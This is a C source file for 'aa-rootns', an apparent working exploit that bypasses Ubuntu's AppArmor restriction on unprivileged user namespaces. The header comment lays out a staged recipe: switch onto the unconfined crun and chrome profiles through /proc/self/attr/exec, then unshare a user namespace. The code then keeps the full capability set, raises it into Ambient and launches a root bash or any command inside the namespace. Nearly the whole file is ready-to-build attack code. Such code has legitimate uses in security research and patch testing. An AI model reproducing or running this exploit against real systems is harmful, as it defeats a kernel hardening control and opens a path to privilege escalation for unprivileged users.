/*
 * aa-rootns — defeat Resolute apparmor unprivileged_userns cap-strip
 *             and drop the caller into a userns with full caps.
 *
 * Why this is needed:
 *   Ubuntu Resolute (24.04+) ships  kernel.apparmor_restrict_unprivileged_userns=1
 *   and the unprivileged_userns AppArmor profile, which together strip all
 *   effective caps the moment an unprivileged user creates a userns. That
 *   was supposed to defang the long-standing "userns LPE primitive" class.
 *
 *   It does not, because Ubuntu also ships /etc/apparmor.d/{crun,chrome},
 *   both of which are flags=(unconfined) and grant the userns rule. Both
 *   are reachable by any unprivileged user via /proc/self/attr/exec, and
 *   neither strips caps when the resulting profile creates a userns.
 *
 * Recipe:
 *   stage 0: change_onexec(crun);       execv self
 *   stage 1: change_onexec(chrome);     execv self
 *   stage 2: unshare(CLONE_NEWUSER); write uid_map / gid_map; we are
 *            now euid=0 inside the new userns and (because chrome is
 *            unconfined) keep the full cap bitmap. Launder Permitted
 *            into Inheritable, then raise into Ambient so the caps
 *            survive the next execv. Then exec the user-supplied
 *            target (bash by default) inside the userns.
 *
 * Usage:
 *   ./aa-rootns                  # drops into root /bin/bash inside userns
 *   ./aa-rootns -p               # print proof and exit
 *   ./aa-rootns -- cmd args...   # run cmd inside the userns
 *   ./aa-rootns -n -- cmd args   # also unshare(NEWNET) before execing cmd
 *
 * Build:  gcc -O2 -Wall -o aa-rootns aa-rootns.c
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sched.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <sys/stat.h>
#include <linux/capability.h>

/* ─── primitives ─────────────────────────────────────────────── */

static int change_onexec(const char *profile) {
    int fd = open("/proc/self/attr/exec", O_WRONLY);
    if (fd < 0) return -1;
    char b[256];
    int n = snprintf(b, sizeof b, "exec %s", profile);
    ssize_t r = write(fd, b, n);
    int e = errno;
    close(fd); errno = e;
    return r == n ? 0 : -1;
}

static void wfile(const char *p, const char *c) {
    int fd = open(p, O_WRONLY);
    if (fd < 0) return;
    (void)!write(fd, c, strlen(c));
    close(fd);
}

static const char *cap_name(int c) {
    static const char *names[] = {
        "chown","dac_override","dac_read_search","fowner","fsetid",
        "kill","setgid","setuid","setpcap","linux_immutable","net_bind_service",
        "net_broadcast","net_admin","net_raw","ipc_lock","ipc_owner",
        "sys_module","sys_rawio","sys_chroot","sys_ptrace","sys_pacct",
        "sys_admin","sys_boot","sys_nice","sys_resource","sys_time",
        "sys_tty_config","mknod","lease","audit_write","audit_control",
        "setfcap","mac_override","mac_admin","syslog","wake_alarm",
        "block_suspend","audit_read","perfmon","bpf","checkpoint_restore",
    };
    return (c >= 0 && c < (int)(sizeof names / sizeof *names)) ? names[c] : "?";
}

static void dump_caps(const char *tag) {
    struct __user_cap_header_struct h = { _LINUX_CAPABILITY_VERSION_3, 0 };
    struct __user_cap_data_struct d[2] = {0};
    syscall(SYS_capget, &h, d);
    fprintf(stderr, "[%s] capE=%08x_%08x  capP=%08x_%08x  capI=%08x_%08x\n",
        tag, d[1].effective, d[0].effective,
        d[1].permitted, d[0].permitted,
        d[1].inheritable, d[0].inheritable);
}

static void dump_label(const char *tag) {
    int fd = open("/proc/self/attr/current", O_RDONLY);
    if (fd < 0) return;
    char b[256] = {0};
    if (read(fd, b, sizeof b - 1) > 0) {
        char *nl = strchr(b, '\n'); if (nl) *nl = 0;
        fprintf(stderr, "[%s] aa=%s uid=%d euid=%d\n", tag, b, getuid(), geteuid());
    }
    close(fd);
}

/* ─── stages ─────────────────────────────────────────────────── */

static int verbose = 0;
static int print_proof = 0;
static int also_unshare_net = 0;
static int interactive = 0;

#define STAGE_TAG "AA-ROOTNS-STAGE-"

static int do_stage0(int argc, char **argv) {
    if (verbose) dump_label("s0");
    if (change_onexec("crun") < 0) {
        fprintf(stderr, "change_onexec(crun): %s\n", strerror(errno));
        fprintf(stderr, "(does /etc/apparmor.d/crun exist? is apparmor active?)\n");
        return 1;
    }
    char **a = calloc(argc + 2, sizeof *a);
    a[0] = argv[0]; a[1] = (char *)STAGE_TAG "1";
    for (int i = 1; i < argc; i++) a[i + 1] = argv[i];
    execv("/proc/self/exe", a);
    perror("execv s1"); return 1;
}

static int do_stage1(int argc, char **argv) {
    if (verbose) dump_label("s1");
    if (change_onexec("chrome") < 0) {
        fprintf(stderr, "change_onexec(chrome): %s\n", strerror(errno));
        return 1;
    }
    argv[1] = (char *)STAGE_TAG "2";
    execv("/proc/self/exe", argv);
    perror("execv s2"); return 1;
}

static int do_stage2(int argc, char **argv) {
    if (verbose) dump_label("s2-entry");
    uid_t ruid = getuid(); gid_t rgid = getgid();

    if (unshare(CLONE_NEWUSER) < 0) {
        perror("unshare(CLONE_NEWUSER)");
        fprintf(stderr, "(is sysctl kernel.unprivileged_userns_clone=0? "
                        "or is the chrome profile patched?)\n");
        return 1;
    }
    wfile("/proc/self/setgroups", "deny");
    {
        char b[64]; snprintf(b, sizeof b, "0 %u 1", ruid);
        wfile("/proc/self/uid_map", b);
        snprintf(b, sizeof b, "0 %u 1", rgid);
        wfile("/proc/self/gid_map", b);
    }
    (void)!setresuid(0, 0, 0);
    (void)!setresgid(0, 0, 0);

    if (verbose) {
        dump_label("s2-postuser");
        dump_caps("s2-postuser");
    }

    /* Permitted → Inheritable, then raise everything we can into Ambient
     * so caps survive the upcoming execv into the target.
     */
    struct __user_cap_header_struct h = { _LINUX_CAPABILITY_VERSION_3, 0 };
    struct __user_cap_data_struct d[2] = {0};
    syscall(SYS_capget, &h, d);
    d[0].inheritable = d[0].permitted;
    d[1].inheritable = d[1].permitted;
    if (syscall(SYS_capset, &h, d) < 0) perror("capset I=P");

    int raised = 0;
    for (int c = 0; c < 64; c++)
        if (prctl(PR_CAP_AMBIENT, PR_CAP_AMBIENT_RAISE, c, 0, 0) == 0) raised++;
    if (verbose)
        fprintf(stderr, "[s2] raised %d caps into Ambient\n", raised);

    if (also_unshare_net) {
        if (unshare(CLONE_NEWNET) < 0) {
            perror("unshare(NET)"); return 1;
        }
        if (verbose) fprintf(stderr, "[s2] unshare(NET) ok\n");
    }

    /* Find argv[i] == "--", everything past that is the target argv */
    int sep = -1;
    for (int i = 2; i < argc; i++) if (!strcmp(argv[i], "--")) { sep = i; break; }

    if (print_proof) {
        printf("=== aa-rootns proof ===\n");
        printf("uid=%d euid=%d gid=%d egid=%d\n", getuid(), geteuid(), getgid(), getegid());
        struct __user_cap_header_struct hh = { _LINUX_CAPABILITY_VERSION_3, 0 };
        struct __user_cap_data_struct dd[2] = {0};
        syscall(SYS_capget, &hh, dd);
        unsigned long long e = ((unsigned long long)dd[1].effective << 32) | dd[0].effective;
        unsigned long long p = ((unsigned long long)dd[1].permitted << 32) | dd[0].permitted;
        printf("cap_effective=0x%016llx\n", e);
        printf("cap_permitted=0x%016llx\n", p);
        printf("caps held:\n");
        for (int c = 0; c < 41; c++)
            if ((e >> c) & 1) printf("    CAP_%s\n", cap_name(c));
        printf("ns-cap probes:\n");
        if (unshare(CLONE_NEWNET) == 0)      printf("    unshare(NEWNET)  ok (CAP_SYS_ADMIN inside userns)\n");
        else                                 printf("    unshare(NEWNET)  FAIL  %s\n", strerror(errno));
        if (unshare(CLONE_NEWUTS) == 0)      printf("    unshare(NEWUTS)  ok\n");
        if (unshare(CLONE_NEWNS)  == 0)      printf("    unshare(NEWNS)   ok\n");
        if (unshare(CLONE_NEWPID) == 0)      printf("    unshare(NEWPID)  ok\n");
        if (unshare(CLONE_NEWIPC) == 0)      printf("    unshare(NEWIPC)  ok\n");
        return 0;
    }

    char **target_argv;
    if (sep > 0 && sep + 1 < argc) {
        target_argv = &argv[sep + 1];
    } else if (interactive) {
        static char *bargv[] = { (char *)"/bin/bash", NULL };
        target_argv = bargv;
    } else {
        static char *bargv[] = { (char *)"/bin/bash", NULL };
        target_argv = bargv;
    }
    execvp(target_argv[0], target_argv);
    perror("execvp target");
    return 1;
}

/* ─── entry ──────────────────────────────────────────────────── */

static void usage(const char *p) {
    fprintf(stderr,
        "usage: %s [-v] [-p] [-n] [-i] [-- cmd args...]\n"
        "  -v   verbose stage tracing\n"
        "  -p   print proof of caps + ns-cap probes, then exit\n"
        "  -n   also unshare(CLONE_NEWNET) before exec\n"
        "  -i   interactive bash inside the userns (default)\n"
        "  --   end of options; exec the rest as the target\n", p);
}

int main(int argc, char **argv) {
    /* If we are being re-entered for stage1 / stage2, dispatch immediately
     * before option parsing (stages pass through the original argv).
     */
    if (argc >= 2) {
        if (!strcmp(argv[1], STAGE_TAG "1")) {
            for (int i = 0; i < argc; i++) if (!strcmp(argv[i], "-v")) verbose = 1;
            return do_stage1(argc, argv);
        }
        if (!strcmp(argv[1], STAGE_TAG "2")) {
            for (int i = 0; i < argc; i++) {
                if (!strcmp(argv[i], "-v")) verbose = 1;
                else if (!strcmp(argv[i], "-p")) print_proof = 1;
                else if (!strcmp(argv[i], "-n")) also_unshare_net = 1;
                else if (!strcmp(argv[i], "-i")) interactive = 1;
                else if (!strcmp(argv[i], "--")) break;
            }
            return do_stage2(argc, argv);
        }
    }

    int i = 1;
    for (; i < argc; i++) {
        if (!strcmp(argv[i], "-h") || !strcmp(argv[i], "--help")) { usage(argv[0]); return 0; }
        else if (!strcmp(argv[i], "-v")) verbose = 1;
        else if (!strcmp(argv[i], "-p")) print_proof = 1;
        else if (!strcmp(argv[i], "-n")) also_unshare_net = 1;
        else if (!strcmp(argv[i], "-i")) interactive = 1;
        else if (!strcmp(argv[i], "--")) break;
        else { fprintf(stderr, "unknown option: %s\n", argv[i]); usage(argv[0]); return 2; }
    }

    return do_stage0(argc, argv);
}
